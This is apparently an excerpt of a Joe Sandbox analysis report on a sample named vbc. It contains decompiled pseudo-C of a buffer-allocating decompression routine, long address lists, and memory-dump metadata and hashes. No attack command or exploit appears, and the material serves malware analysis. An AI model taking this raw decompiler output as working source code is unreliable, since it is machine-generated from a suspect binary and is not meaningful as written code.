												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406b79
0x00406b79
0x00406b7d
0x00406b9e
0x00406ba5
0x00406bab
0x00406bb1
0x00406bc3
0x00406bc9
0x00406bce
0x00000000
0x00406b7f
0x00406b85
0x00406f46
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00000000
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00406fc2
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00000000
0x00406fc8
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00406f49
0x00406f46
0x00000000
0x00406b7d

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C97() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
